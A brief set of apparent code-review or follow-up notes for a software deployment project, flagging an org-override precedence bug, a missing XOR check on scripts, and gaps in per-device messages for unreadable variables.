- The org-override precedence bug deserves its own issue and release note.
- No XOR CHECK on `scripts`.
- Per-device messages for an unreadable variable (`describeVariableFailure`, `softwareDeployment.ts`'s silent filter, the bundle importer's save-time secret detection can't see an unreadable row).
